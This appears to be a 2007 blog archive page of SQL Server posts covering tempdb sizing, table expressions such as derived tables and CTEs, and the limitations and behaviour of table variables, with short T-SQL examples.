SQL Server stores data in tempdb for many activities that happen behind the scenes such as: spooling data for queries, sorting, row versioning, as well as holding temporary tables and table variables. Since this data is physically materialized on disk, tempdb becomes an obvious bottleneck forcing us to make special considerations.

Any system with heavy use should have tempdb on its own disk array, separate from where user databases are located. Obviously you'll want to use as many spindles as possible, striping in RAID 10 (RAID 1 can be used for the log).

Every time SQL Server is restarted, tempdb is recreated and its size reverts to the effective defined size, which defaults to 8MB. Since this will likely be too small for most databases, it will grow by 10% per growth, creating small files that will likely be fragmented within the file system. Since processes will need to wait around for the file to grow, it is suggested that you set this to an appropriate size for your database and workload.

In order to determine what an appropriate size is, you can observe the size of tempdb when the system is under load. You can then alter the SIZE parameter so that the effective defined size is more appropriate. Once this is set you won't have to worry about autogrowth until tempdb gets full, which ideally would only happen during irregular activity.
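
As a sketch, once you've watched tempdb under load you might size it explicitly along these lines (the sizes are placeholders; check your instance's logical file names with sp_helpfile first):

ALTER DATABASE tempdb MODIFY FILE (NAME = tempdev, SIZE = 2048MB, FILEGROWTH = 256MB);
ALTER DATABASE tempdb MODIFY FILE (NAME = templog, SIZE = 512MB, FILEGROWTH = 128MB);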

Monday, May 07, 2007

Temporary Tables, Table Variables, Table Expressions - Part 3/4

Table Expressions
In addition to physical temp tables we also have logical temporary tables, which are merely virtual materializations of interim sets (as opposed to the physical materialization in temporary tables and table variables). Table expressions, which include derived tables, common table expressions (CTEs), views and inline table-valued UDFs, give you this capability. This article will discuss situations where you may or may not want to utilize these table expressions.

In general, table expressions should be used in cases when you need the temporary object only for simplification. Table expressions should also be used when you only need to access the temporary data once or a limited number of times and do not need to index the interim results. When you run a query with a table expression, the query optimizer merges the underlying query with the outer one, querying the underlying tables directly.

Other than simplification, there will be some cases where you'll want to use table expressions in order to improve performance; in these cases the optimizer might generate a better plan for your query compared to other alternatives.

In terms of scope and visibility, derived tables and CTEs are available only to the current statement, while views and inline UDFs are available globally.
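
A quick sketch of the same query written as a derived table and as a CTE, reusing the dbo.Groups table from the medians post; either way there is no interim materialization, the optimizer folds the expression into the outer query:

-- derived table
SELECT G.groupid, G.maxval
FROM (SELECT groupid, MAX(val) AS maxval
FROM dbo.Groups
GROUP BY groupid) AS G
WHERE G.maxval > 5;

-- equivalent CTE
WITH G AS
(
SELECT groupid, MAX(val) AS maxval
FROM dbo.Groups
GROUP BY groupid
)
SELECT groupid, maxval
FROM G
WHERE maxval > 5;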

Temporary Tables (#Tables)
Table Variables (@Tables)
Table Expressions (CTEs)

Sunday, May 06, 2007

Temporary Tables, Table Variables, Table Expressions - Part 2/4


Table Variables

Many would agree that table variables are some of the least understood T-SQL elements. There are many myths associated with their use, such as table variables being purely memory-resident (not having physical representation) and therefore always preferable to temporary tables. I'd like to explain why these myths are unfounded and explain some situations where you might want to use or not use table variables.

Limitations
Unlike physical and temporary tables, there are certain limitations placed on table variables.

  • you cannot make explicit indexes on table variables, only PRIMARY KEY and UNIQUE constraints (which create unique indexes under the covers); in fact you can't create non-unique indexes (see the sketch after this list)
  • you cannot change the structure or table definition once it is declared
  • you cannot issue a SELECT INTO statement against a table variable (however, you can use INSERT EXEC)
  • you cannot qualify a column name with a table variable name
  • in queries that modify table variables, parallel plans will not be used.
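
A small sketch of the indexing limitation above (the @orders variable is a made-up example): the only "indexes" you get on a table variable are the ones implied by constraints declared inline.

DECLARE @orders TABLE
(
orderid INT NOT NULL PRIMARY KEY,  -- implies a unique clustered index
customerid INT NOT NULL,
orderdate SMALLDATETIME NOT NULL,
UNIQUE (customerid, orderid)  -- implies a unique nonclustered index
);
-- a plain non-unique index on customerid alone is not possible,
-- and CREATE INDEX cannot target @orders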

tempdb
Despite popular belief, table variables do have physical representation in tempdb, similar to temporary tables.

Scope and Visibility
The scope of table variables is very well defined, and it is the same as any other variable: the current level and within the current batch only. You cannot access a table variable within inner levels of the call stack, nor even within other batches at the same level. The limited scope will likely be an important deciding factor when determining whether to use temporary tables or table variables.

Transaction Context
Unlike a temporary table, a table variable is not part of an outer transaction; rather, its transaction scope is limited to the statement level in order to support statement rollback. When you modify a table variable and the statement is aborted, that particular statement is undone. However, if the outer transaction for that statement is rolled back after the statement has finished, the changes will not be undone. Table variables are pretty unique in this respect and we can use this property to our advantage. Because table variables require less locking and logging, there are obvious performance benefits.

Statistics
The main factor in choosing whether or not to use table variables is that the query optimizer does not create distribution statistics or maintain accurate cardinality information for them. Therefore queries against the table variable may not use an efficient plan, which will obviously be a big problem when you work with larger tables. The upside to using table variables is avoiding the overhead of calculating these statistics and dealing with the recompilations they trigger.

In the next article I'll discuss table expressions, how they work and when you'll want to use these instead of temporary tables and table variables.

Temporary Tables (#Tables)
Table Variables (@Tables)
Table Expressions (CTEs)